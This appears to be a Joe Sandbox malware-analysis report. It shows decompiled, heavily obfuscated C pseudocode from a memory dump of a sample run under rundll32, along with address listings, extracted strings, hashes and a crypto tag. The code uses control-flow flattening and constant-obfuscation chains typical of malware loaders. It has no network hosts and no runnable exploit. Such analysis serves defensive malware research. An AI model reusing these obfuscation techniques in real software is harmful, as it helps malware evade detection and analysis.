				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00005deb;
				_v328 = 0xf0a5;
				_v328 = _v328 | 0xb0da4f33;
				_v328 = _v328 >> 2;
				_v328 = _v328 + 0x1048;
				_v328 = _v328 ^ 0x2c36fa11;
				_v36 = 0x2a74;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00007692;
				_v188 = 0x2f66;
				_v188 = _v188 ^ 0x45e45990;
				_t907 = 0x18;
				_v188 = _v188 * 0x59;
				_v188 = _v188 ^ 0x4c6d2c94;
				_v196 = 0xbe6b;
				_v196 = _v196 | 0xf46158a2;
				_v196 = _v196 >> 0xc;
				_v196 = _v196 ^ 0x000f6213;
				_v88 = 0x4547;
				_v88 = _v88 << 1;
				_v88 = _v88 ^ 0x0000e110;
				_v96 = 0xb81;
				_v96 = _v96 | 0xae38e917;
				_v96 = _v96 ^ 0xae38b032;
				_v256 = 0x7754;
				_v256 = _v256 + 0xfa4d;
				_v256 = _v256 | 0x1efef3a7;
				_v256 = _v256 * 0xd;
				_v256 = _v256 ^ 0x92ff6df5;
				_v228 = 0xfbcd;
				_v228 = _v228 | 0x05cff199;
				_v228 = _v228 + 0xcc2;
				_v228 = _v228 ^ 0x05d05a46;
				_v320 = 0x8c88;
				_v320 = _v320 + 0xc4c7;
				_v320 = _v320 ^ 0x8fac5d5e;
				_v320 = _v320 * 0x41;
				_v320 = _v320 ^ 0x7af02945;
				_v224 = 0xc0c1;
				_v224 = _v224 >> 0xe;
				_v224 = _v224 << 0xf;
				_v224 = _v224 ^ 0x0001d04a;
				_v132 = 0x9e59;
				_v132 = _v132 | 0x8ad22999;
				_v132 = _v132 ^ 0x8ad28a97;
				_v264 = 0xdddc;
				_v264 = _v264 | 0xc797c5af;
				_v264 = _v264 << 0xc;
				_v264 = _v264 + 0xffffdbb5;
				_v264 = _v264 ^ 0x7ddf8dbd;
				_v272 = 0xbb3;
				_v272 = _v272 + 0xffffc942;
				_v272 = _v272 + 0x6fc5;
				_v272 = _v272 / _t907;
				_v272 = _v272 ^ 0x00002501;
				_v204 = 0x93cc;
				_v204 = _v204 << 9;
				_v204 = _v204 * 0x25;
				_v204 = _v204 ^ 0x2ab896dd;
				_v212 = 0x2aa;
				_v212 = _v212 << 0xf;
				_v212 = _v212 + 0xea80;
				_v212 = _v212 ^ 0x0155e81e;
				_v140 = 0x154e;
				_t908 = 0x5c;
				_v140 = _v140 / _t908;
				_v140 = _v140 >> 0xf;
				_v140 = _v140 ^ 0x000002fd;
				_v148 = 0xb2ba;
				_v148 = _v148 >> 8;
				_v148 = _v148 + 0xffffdc87;
				_v148 = _v148 ^ 0xffffeb86;
				_v156 = 0x2cda;
				_v156 = _v156 << 8;
				_v156 = _v156 >> 1;
				_v156 = _v156 ^ 0x0016035f;
				_v232 = 0xbd1e;
				_t909 = 0x6e;
				_v232 = _v232 / _t909;
				_v232 = _v232 >> 6;
				_v232 = _v232 << 0xa;
				_v232 = _v232 ^ 0x00003d22;
				_t910 = _v28;
				while(1) {
					L1:
					_t876 = 0xefeb7d0;
					while(1) {
						_t923 = _t911 - _t876;
						if(_t923 <= 0) {
						}
						L3:
						if(_t923 == 0) {
							_t782 = E001F9B08(_v280, _v104, _t817, _v112, _v120, _t817, _v288, _a36, _v24, _v296, _v304, _t817, _v312, _v128, _a8);
							_t919 = _t919 + 0x38;
							_v340 = _t782;
							__eflags = _t782;
							_t911 =  !=  ? 0x21341eb : 0x5c03e16;
							goto L15;
						} else {
							if(_t911 == 0x17e99f4) {
								E001F8DF2(_v228, _t910, _v320, _v224, _v132);
								_t919 = _t919 + 0xc;
								goto L22;
							} else {
								if(_t911 == 0x21341eb) {
									__eflags = _t815;
									if(__eflags != 0) {
										_push(0x1f1244);
										_push(_v48);
										_t800 = E0020BF25(_v108, _v268, __eflags);
										_t817 = _t800;
										_v344 = _t800;
									}
									_t794 = E001F3391(_a20, _t817, _t817, _t817, _v332, _v92, _v176 | _v300 | _v60 | _v236 | _v100 | _v208 | _v44 | _v292 | _v144, _v340, _v192, _v168, _v200, _t817, _v336, _t817, _v260);
									_t910 = _t794;
									_t824 = _v184;
									E0020C5F7(_t824, _v152, _v84, _v52, _v344);
									_t919 = _t919 + 0x40;
									__eflags = _t794;
									if(__eflags == 0) {
										L22:
										_t911 = 0x3b577df8;
									} else {
										_push(_t824);
										_v28 = 1;
										_t799 = E001F22E8(_v76, _t910,  &_v28, _t824, _v328, _v36);
										_t919 = _t919 + 0x14;
										_v28 = _t799;
										_t911 = 0x2b165a6b;
									}
									goto L14;
								} else {
									if(_t911 == 0x5c03e16) {
										E001F8DF2(_v140, _v24, _v148, _v156, _v232);
									} else {
										if(_t911 == 0x6187cef) {
											__eflags = E001F6AC1(_t910, _v252, __eflags) - _v308;
											_t911 =  ==  ? 0x121268fd : 0x17e99f4;
											goto L14;
										} else {
											if(_t911 != 0xe64d539) {
												L41:
												__eflags = _t911 - 0x18f37a27;
												if(__eflags != 0) {
													while(1) {
														_t923 = _t911 - _t876;
														if(_t923 <= 0) {
														}
														goto L24;
													}
													goto L3;
												}
											} else {
												_v20 = 0x200;
												_t806 = E002057E8(0x200);
												_t916 = _t806;
												_t833 = 0x200;
												if(_t806 != 0) {
													_t834 = _v324;
													_t808 = E001F7B20(_t834, _t916, _t833, _v244,  &_v20);
													_t921 = _t919 + 0xc;
													if(_t808 == 0) {
														_push(_v160);
														_push(_t834);
														_t810 = E0020CDCC(_v276, _v124, _v40, _v116, _t834, _t916);
														_t921 = _t921 + 0x18;
														_v32 = _t810;
													}
													E001F91CD(_v216, _v136, _v316, _t916, _v68);
													_t919 = _t921 + 0xc;
												}
												_t911 = 0x26e9ad1b;
												L14:
												_t782 = _v340;
												L15:
												_t817 = _v344;
												goto L1;
											}
										}
									}
								}
							}
						}
						L44:
						return _t917;
						L24:
						__eflags = _t911 - 0x121268fd;
						if(_t911 == 0x121268fd) {
							__eflags = E0020676B(_t910, _a28);
							_t911 = 0x17e99f4;
							_t776 = 1;
							_t917 =  !=  ? _t776 : _t917;
							goto L40;
						} else {
							__eflags = _t911 - 0x26e9ad1b;
							if(_t911 == 0x26e9ad1b) {
								_push(_t817);
								_t779 = E001F89C3(_v32, _t876, _v72, _v240, _v80, _v180, _t817, _v248);
								__eflags = _t779;
								_v24 = _t779;
								_t911 =  !=  ? 0xefeb7d0 : 0x18f37a27;
								E001F91CD(_v56, _v164, _v172, _v32, _v64);
								_t919 = _t919 + 0x28;
								L40:
								_t817 = _v344;
								_t876 = 0xefeb7d0;
								goto L41;
							} else {
								__eflags = _t911 - 0x2a775466;
								if(__eflags == 0) {
									_t911 = 0xe64d539;
									continue;
								} else {
									__eflags = _t911 - 0x2b165a6b;
									if(_t911 == 0x2b165a6b) {
										__eflags = _t815;
										if(_t815 == 0) {
											_t811 = 0;
											__eflags = 0;
										} else {
											_t811 =  *((intOrPtr*)(_t815 + 4));
										}
										__eflags = _t815;
										if(_t815 == 0) {
											_t879 = 0;
											__eflags = 0;
										} else {
											_t879 =  *_t815;
										}
										_push(_t817);
										E001F7D55(_v188, _t879, _a40, _v196, _v88, _t910, _t811, _v96, _v256);
										_t919 = _t919 + 0x20;
										asm("sbb esi, esi");
										_t911 = (_t911 & 0x0499e2fb) + 0x17e99f4;
										goto L14;
									} else {
										__eflags = _t911 - 0x3b577df8;
										if(_t911 != 0x3b577df8) {
											goto L41;
										} else {
											E001F8DF2(_v264, _t782, _v272, _v204, _v212);
											_t919 = _t919 + 0xc;
											_t911 = 0x5c03e16;
											goto L14;
										}
									}
								}
							}
						}
						goto L44;
					}
				}
			}

0x001faddc
0x001fade6
0x001fadf0
0x001fadf1
0x001fadf8
0x001fadff
0x001fae00
0x001fae07
0x001fae0e
0x001fae15
0x001fae1c
0x001fae23
0x001fae24
0x001fae25
0x001fae2a
0x001fae37
0x001fae3e
0x001fae40
0x001fae47
0x001fae49
0x001fae54
0x001fae57
0x001fae64
0x001fae6f
0x001fae74
0x001fae85
0x001fae88
0x001fae8c
0x001fae93
0x001fae9e
0x001faea6
0x001faeae
0x001faeb6
0x001faebe
0x001faec6
0x001faecb
0x001faed3
0x001faedb
0x001faee6
0x001faef1
0x001faef9
0x001faf04
0x001faf0c
0x001faf1c
0x001faf20
0x001faf28
0x001faf30
0x001faf3b
0x001faf46
0x001faf51
0x001faf5c
0x001faf67
0x001faf72
0x001faf7d
0x001faf8f
0x001faf92
0x001faf99
0x001fafa4
0x001fafac
0x001fafb4
0x001fafb9
0x001fafc1
0x001fafc9
0x001fafd4
0x001fafdf
0x001fafea
0x001faff4
0x001fb003
0x001fb006
0x001fb00a
0x001fb012
0x001fb01a
0x001fb025
0x001fb03b
0x001fb042
0x001fb04d
0x001fb055
0x001fb05d
0x001fb06a
0x001fb06d
0x001fb071
0x001fb079
0x001fb084
0x001fb08f
0x001fb09a
0x001fb0a2
0x001fb0aa
0x001fb0b2
0x001fb0ba
0x001fb0c2
0x001fb0cd
0x001fb0d8
0x001fb0e0
0x001fb0eb
0x001fb0fb
0x001fb0ff
0x001fb107
0x001fb10f
0x001fb117
0x001fb123
0x001fb128
0x001fb12e
0x001fb136
0x001fb13e
0x001fb146
0x001fb14e
0x001fb158
0x001fb159
0x001fb15d
0x001fb165
0x001fb16d
0x001fb181
0x001fb188
0x001fb193
0x001fb19e
0x001fb1a9
0x001fb1b4
0x001fb1bf
0x001fb1ca
0x001fb1d5
0x001fb1e0
0x001fb1eb
0x001fb1f6
0x001fb201
0x001fb20c
0x001fb217
0x001fb222
0x001fb22d
0x001fb237
0x001fb23f
0x001fb244
0x001fb249
0x001fb251
0x001fb25c
0x001fb267
0x001fb272
0x001fb27d
0x001fb288
0x001fb293
0x001fb29b
0x001fb2a0
0x001fb2a8
0x001fb2b0
0x001fb2b8
0x001fb2c3
0x001fb2ce
0x001fb2d9
0x001fb2e4
0x001fb2ef
0x001fb2fa
0x001fb305
0x001fb310
0x001fb318
0x001fb323
0x001fb32e
0x001fb336
0x001fb341
0x001fb34c
0x001fb357
0x001fb36b
0x001fb370
0x001fb379
0x001fb384
0x001fb38f
0x001fb397
0x001fb3a2
0x001fb3aa
0x001fb3b2
0x001fb3bf
0x001fb3c2
0x001fb3c6
0x001fb3ce
0x001fb3d9
0x001fb3e1
0x001fb3ec
0x001fb3f7
0x001fb3ff
0x001fb40a
0x001fb412
0x001fb41a
0x001fb422
0x001fb427
0x001fb42f
0x001fb43c
0x001fb446
0x001fb447
0x001fb44b
0x001fb450
0x001fb458
0x001fb460
0x001fb465
0x001fb46a
0x001fb472
0x001fb47a
0x001fb482
0x001fb491
0x001fb49b
0x001fb4a0
0x001fb4a6
0x001fb4ae
0x001fb4b9
0x001fb4c4
0x001fb4cf
0x001fb4da
0x001fb4e5
0x001fb4f0
0x001fb4f8
0x001fb505
0x001fb508
0x001fb514
0x001fb518
0x001fb520
0x001fb52b
0x001fb533
0x001fb53e
0x001fb546
0x001fb54e
0x001fb556
0x001fb55e
0x001fb566
0x001fb571
0x001fb579
0x001fb584
0x001fb596
0x001fb59b
0x001fb5a4
0x001fb5af
0x001fb5ba
0x001fb5c5
0x001fb5d0
0x001fb5db
0x001fb5e6
0x001fb5f1
0x001fb5f9
0x001fb604
0x001fb60f
0x001fb617
0x001fb61c
0x001fb624
0x001fb62c
0x001fb634
0x001fb63c
0x001fb648
0x001fb64d
0x001fb657
0x001fb65a
0x001fb65e
0x001fb666
0x001fb671
0x001fb67c
0x001fb687
0x001fb694
0x001fb6a8
0x001fb6ad
0x001fb6b6
0x001fb6be
0x001fb6c9
0x001fb6d4
0x001fb6df
0x001fb6ea
0x001fb6f5
0x001fb700
0x001fb70b
0x001fb716
0x001fb71e
0x001fb729
0x001fb731
0x001fb739
0x001fb73e
0x001fb746
0x001fb74e
0x001fb759
0x001fb761
0x001fb76c
0x001fb777
0x001fb78a
0x001fb78b
0x001fb792
0x001fb79d
0x001fb7a8
0x001fb7b3
0x001fb7bb
0x001fb7c6
0x001fb7d1
0x001fb7d8
0x001fb7e3
0x001fb7ee
0x001fb7f9
0x001fb804
0x001fb80c
0x001fb814
0x001fb821
0x001fb825
0x001fb82d
0x001fb838
0x001fb843
0x001fb84e
0x001fb859
0x001fb861
0x001fb869
0x001fb876
0x001fb87a
0x001fb882
0x001fb88d
0x001fb895
0x001fb89d
0x001fb8a8
0x001fb8b3
0x001fb8be
0x001fb8c9
0x001fb8d1
0x001fb8d9
0x001fb8de
0x001fb8e6
0x001fb8ee
0x001fb8f6
0x001fb8fe
0x001fb90c
0x001fb910
0x001fb918
0x001fb923
0x001fb933
0x001fb93a
0x001fb945
0x001fb952
0x001fb95a
0x001fb965
0x001fb970
0x001fb984
0x001fb989
0x001fb992
0x001fb99a
0x001fb9a5
0x001fb9b0
0x001fb9b8
0x001fb9c3
0x001fb9ce
0x001fb9d9
0x001fb9e1
0x001fb9e8
0x001fb9f3
0x001fba05
0x001fba08
0x001fba0f
0x001fba17
0x001fba1f
0x001fba2a
0x001fba35
0x001fba35
0x001fba35
0x001fba3a
0x001fba3a
0x001fba3c
0x001fba3c
0x001fba42
0x001fba42
0x001fbcd2
0x001fbcd7
0x001fbcda
0x001fbcde
0x001fbcea
0x00000000
0x001fba48
0x001fba4e
0x001fbc75
0x001fbc7a
0x00000000
0x001fba54
0x001fba5b
0x001fbb4e
0x001fbb50
0x001fbb52
0x001fbb57
0x001fbb69
0x001fbb70
0x001fbb72
0x001fbb72
0x001fbbe6
0x001fbbef
0x001fbc06
0x001fbc0d
0x001fbc12
0x001fbc15
0x001fbc17
0x001fbc7d
0x001fbc7d
0x001fbc19
0x001fbc19
0x001fbc2a
0x001fbc41
0x001fbc46
0x001fbc49
0x001fbc50
0x001fbc50
0x00000000
0x001fba61
0x001fba67
0x001fbe83
0x001fba6d
0x001fba73
0x001fbb42
0x001fbb49
0x00000000
0x001fba79
0x001fba7f
0x001fbe4f
0x001fbe4f
0x001fbe55
0x001fba3a
0x001fba3a
0x001fba3c
0x001fba3c
0x00000000
0x001fba3c
0x00000000
0x001fba3a
0x001fba85
0x001fba96
0x001fba9d
0x001fbaa2
0x001fbaa4
0x001fbaa7
0x001fbab8
0x001fbabc
0x001fbac1
0x001fbac6
0x001fbac8
0x001fbacf
0x001fbaeb
0x001fbaf0
0x001fbaf3
0x001fbaf3
0x001fbb14
0x001fbb19
0x001fbb19
0x001fbb1c
0x001fbb21
0x001fbb21
0x001fbb25
0x001fbb25
0x00000000
0x001fbb25
0x001fba7f
0x001fba73
0x001fba67
0x001fba5b
0x001fba4e
0x001fbe8d
0x001fbe97
0x001fbcf2
0x001fbcf2
0x001fbcf8
0x001fbe39
0x001fbe3b
0x001fbe42
0x001fbe43
0x00000000
0x001fbcfe
0x001fbcfe
0x001fbd04
0x001fbdba
0x001fbde3
0x001fbdef
0x001fbdf1
0x001fbe17
0x001fbe21
0x001fbe26
0x001fbe46
0x001fbe46
0x001fbe4a
0x00000000
0x001fbd0a
0x001fbd0a
0x001fbd10
0x001fbdb0
0x00000000
0x001fbd16
0x001fbd16
0x001fbd1c
0x001fbd54
0x001fbd56
0x001fbd5d
0x001fbd5d
0x001fbd58
0x001fbd58
0x001fbd58
0x001fbd5f
0x001fbd61
0x001fbd67
0x001fbd67
0x001fbd63
0x001fbd63
0x001fbd63
0x001fbd69
0x001fbd93
0x001fbd98
0x001fbd9d
0x001fbda5
0x00000000
0x001fbd1e
0x001fbd1e
0x001fbd24
0x00000000
0x001fbd2a
0x001fbd42
0x001fbd47
0x001fbd4a
0x00000000
0x001fbd4a
0x001fbd24
0x001fbd1c
0x001fbd10
0x001fbd04
0x00000000
0x001fbcf8
0x001fba3a

Strings

}9, xrefs: 001FB0E0
gO, xrefs: 001FAF20
[, xrefs: 001FB19E
GE, xrefs: 001FB7C6
Z]oU, xrefs: 001FB61C
f/, xrefs: 001FB76C
E, xrefs: 001FAE64
#S, xrefs: 001FB427
-, xrefs: 001FB20C
:Z, xrefs: 001FB2C3
h}*3, xrefs: 001FB518
/<, xrefs: 001FB533
t*, xrefs: 001FB74E
fTw*, xrefs: 001FBD0A
-X, xrefs: 001FB54E
JF, xrefs: 001FB188
oH, xrefs: 001FB0AA
"=, xrefs: 001FBA1F
Vm, xrefs: 001FB357
FT, xrefs: 001FB13E
fTw*, xrefs: 001FAE6F
Tw, xrefs: 001FB804
], xrefs: 001FB71E
t", xrefs: 001FB384
M, xrefs: 001FAFEA

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "=$#S$-$-X$/<$:Z$E$FT$GE$JF$M$Tw$Vm$Z]oU$f/$fTw*$fTw*$gO$h}*3$oH$t"$t*$}9$[$]
API String ID: 0-299718466
Opcode ID: 4b0e8aac4c8d198f103b0f0479cc826371a692140af45d742db321019659a293
Instruction ID: 7792522c6b2848020e08adaa9110d0a5972a3bf9079357cd4d29da634750bbe4
Opcode Fuzzy Hash: 4b0e8aac4c8d198f103b0f0479cc826371a692140af45d742db321019659a293
Instruction Fuzzy Hash: B682FF7150C7808BE379CF65C98AB9FBBE1BBC4314F108A1DE2D9962A0D7B58945CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00209DC0, Relevance: 30.8, Strings: 24, Instructions: 774
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00209DC0(void* __ecx, void* __edx) {
				void* __edi;
				void* _t760;
				intOrPtr _t823;
				void* _t831;
				signed int _t881;
				short _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				intOrPtr _t902;
				void* _t906;
				signed int _t909;
				signed int _t914;
				signed int _t926;
				signed int _t928;
				signed int _t930;
				short* _t998;
				short* _t999;
				intOrPtr _t1002;
				signed int _t1006;
				short _t1008;
				intOrPtr _t1010;
				void* _t1011;
				void* _t1012;
				void* _t1015;
				void* _t1016;

				_push( *((intOrPtr*)(_t1011 + 0xc9c)));
				_t997 =  *((intOrPtr*)(_t1011 + 0xc94));
				_push( *((intOrPtr*)(_t1011 + 0xc94)));
				_push( *((intOrPtr*)(_t1011 + 0xc9c)));
				_push( *((intOrPtr*)(_t1011 + 0xc94)));
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t760);
				 *(_t1011 + 0x114) = 0x5191;
				_t1008 = 0;
				_t1012 = _t1011 + 0x18;
				 *((intOrPtr*)(_t1012 + 0x150)) = 0;
				_t906 = 0x2a5de1a5;
				 *(_t1012 + 0xfc) =  *(_t1011 + 0x114) * 0x56;
				 *(_t1012 + 0xfc) =  *(_t1012 + 0xfc) ^ 0x001b362a;
				 *(_t1012 + 0xf4) = 0x7b48;
				 *(_t1012 + 0xf4) =  *(_t1012 + 0xf4) + 0xfffffae2;
				 *(_t1012 + 0xf4) =  *(_t1012 + 0xf4) ^ 0x0000048e;
				 *(_t1012 + 0x1c) = 0xfb4b;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) >> 0xf;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) + 0xd610;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) | 0xf3105de5;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) ^ 0xf310f378;
				 *(_t1012 + 0x18) = 0x9b1e;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) >> 8;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) ^ 0xb792a5e4;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) | 0xa0a9b449;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) ^ 0xb7bbf9a0;
				 *(_t1012 + 0x148) = 0x8759;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) + 0xffffcbd8;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) ^ 0x0000703f;
				 *(_t1012 + 0x24) = 0x14b0;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) * 0x38;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) | 0xd4c47a9c;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) + 0xffff1c59;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) ^ 0xd4c44860;
				 *(_t1012 + 0xb0) = 0x6232;
				 *(_t1012 + 0xb0) =  *(_t1012 + 0xb0) ^ 0xdc31e630;
				 *(_t1012 + 0xb0) =  *(_t1012 + 0xb0) >> 1;
				 *(_t1012 + 0xb0) =  *(_t1012 + 0xb0) ^ 0x6e1897ce;
				 *(_t1012 + 0x2c) = 0x7298;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) + 0x69dd;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) | 0x6390fda1;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) ^ 0xdd2d2ef6;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) ^ 0xbebdb0ec;
				 *(_t1012 + 0xc0) = 0x228e;
				 *(_t1012 + 0xc0) =  *(_t1012 + 0xc0) ^ 0x1a8b5cf2;
				 *(_t1012 + 0xc0) =  *(_t1012 + 0xc0) * 0xc;
				 *(_t1012 + 0xc0) =  *(_t1012 + 0xc0) ^ 0x3e89f3bf;
				 *(_t1012 + 0x84) = 0x762e;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) * 0x59;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) | 0x558f0020;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) >> 6;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) ^ 0x0156e9fd;
				 *(_t1012 + 0x114) = 0x835d;
				 *(_t1012 + 0x114) =  *(_t1012 + 0x114) << 1;
				 *(_t1012 + 0x114) =  *(_t1012 + 0x114) ^ 0x00012854;
				 *(_t1012 + 0x7c) = 0x96c1;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) << 4;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) + 0xffff53be;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) | 0xfd5d0ed6;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) ^ 0xfd5dc139;
				 *(_t1012 + 0x74) = 0xffcb;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) >> 4;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) + 0xa69f;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) | 0x535a1459;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) ^ 0x535ae4d6;
				 *(_t1012 + 0xc4) = 0xe3;
				 *(_t1012 + 0xc4) =  *(_t1012 + 0xc4) + 0xffffd99b;
				 *(_t1012 + 0xc4) =  *(_t1012 + 0xc4) * 0x50;
				 *(_t1012 + 0xc4) =  *(_t1012 + 0xc4) ^ 0xfff472d0;
				 *(_t1012 + 0x88) = 0xbaa6;
				 *(_t1012 + 0x88) =  *(_t1012 + 0x88) ^ 0xbd6a9f93;
				 *(_t1012 + 0x88) =  *(_t1012 + 0x88) << 7;
				 *(_t1012 + 0x88) =  *(_t1012 + 0x88) ^ 0xb512a337;
				 *(_t1012 + 0xb4) = 0x3531;
				 *(_t1012 + 0xb4) =  *(_t1012 + 0xb4) << 6;
				 *(_t1012 + 0xb4) =  *(_t1012 + 0xb4) >> 0xe;
				 *(_t1012 + 0xb4) =  *(_t1012 + 0xb4) ^ 0x000012d0;
				 *(_t1012 + 0xa8) = 0xe66d;
				 *(_t1012 + 0xa8) =  *(_t1012 + 0xa8) ^ 0x1985e749;
				 *(_t1012 + 0xa8) =  *(_t1012 + 0xa8) << 0x10;
				 *(_t1012 + 0xa8) =  *(_t1012 + 0xa8) ^ 0x01240ff4;
				 *(_t1012 + 0x68) = 0xdadb;
				_t884 = 0x72;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x68) / _t884;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) << 5;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) << 0xd;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) ^ 0x07ac09df;
				 *(_t1012 + 0x11c) = 0xa461;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) + 0xffffc6b7;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) ^ 0x0000386c;
				 *(_t1012 + 0x138) = 0xbe4d;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) + 0xffffcdbc;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) ^ 0x000091a9;
				 *(_t1012 + 0x98) = 0x5b34;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) ^ 0x9869eb0c;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) + 0xffff7c43;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) ^ 0x98694e20;
				 *(_t1012 + 0x90) = 0xb3cb;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) + 0xffff6388;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0x2c5ba937;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0x2c5bd4ce;
				 *(_t1012 + 0x48) = 0x52c0;
				_t885 = 0x62;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) / _t885;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) + 0xffff9124;
				_t886 = 0x2b;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) * 0x41;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) ^ 0xffe43930;
				 *(_t1012 + 0x40) = 0xac8b;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) << 0xd;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) >> 3;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) + 0xa7db;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) ^ 0x02b29829;
				 *(_t1012 + 0x148) = 0x643b;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) / _t886;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) ^ 0x000010f3;
				 *(_t1012 + 0x128) = 0xa997;
				 *(_t1012 + 0x128) =  *(_t1012 + 0x128) << 0xa;
				 *(_t1012 + 0x128) =  *(_t1012 + 0x128) ^ 0x02a66a03;
				 *(_t1012 + 0x38) = 0x7f7f;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) + 0xffffaeb4;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) + 0xffff06c6;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) << 0xf;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) ^ 0x9a7cd3e3;
				 *(_t1012 + 0xa8) = 0xf2f;
				_t887 = 0x4b;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa8) * 0x34;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) * 0x15;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) ^ 0x0040dcde;
				 *(_t1012 + 0x9c) = 0x259b;
				 *(_t1012 + 0x9c) =  *(_t1012 + 0x9c) / _t887;
				 *(_t1012 + 0x9c) =  *(_t1012 + 0x9c) | 0xb0025bdd;
				 *(_t1012 + 0x9c) =  *(_t1012 + 0x9c) ^ 0xb0023f27;
				 *(_t1012 + 0x5c) = 0xf72d;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) + 0xb64c;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) + 0xffff542c;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) >> 3;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) ^ 0x00003f89;
				 *(_t1012 + 0x54) = 0xcb46;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0x17d5c45e;
				_t888 = 0xf;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x54) * 0x28;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x58) * 0x7b;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x58) ^ 0x06ba3f8c;
				 *(_t1012 + 0x130) = 0x1c0d;
				 *(_t1012 + 0x130) =  *(_t1012 + 0x130) << 3;
				 *(_t1012 + 0x130) =  *(_t1012 + 0x130) ^ 0x0000c19e;
				 *(_t1012 + 0x50) = 0x99a2;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) * 0x3c;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) << 2;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) ^ 0x0b9e099b;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) ^ 0x0b0e3d8f;
				 *(_t1012 + 0xdc) = 0xc4f9;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) / _t888;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) ^ 0x00001e9f;
				 *(_t1012 + 0x134) = 0xe9a6;
				_t889 = 0x25;
				 *(_t1012 + 0x134) =  *(_t1012 + 0x134) * 0x38;
				 *(_t1012 + 0x134) =  *(_t1012 + 0x134) ^ 0x00330038;
				 *(_t1012 + 0x104) = 0xfa06;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) + 0xffff4131;
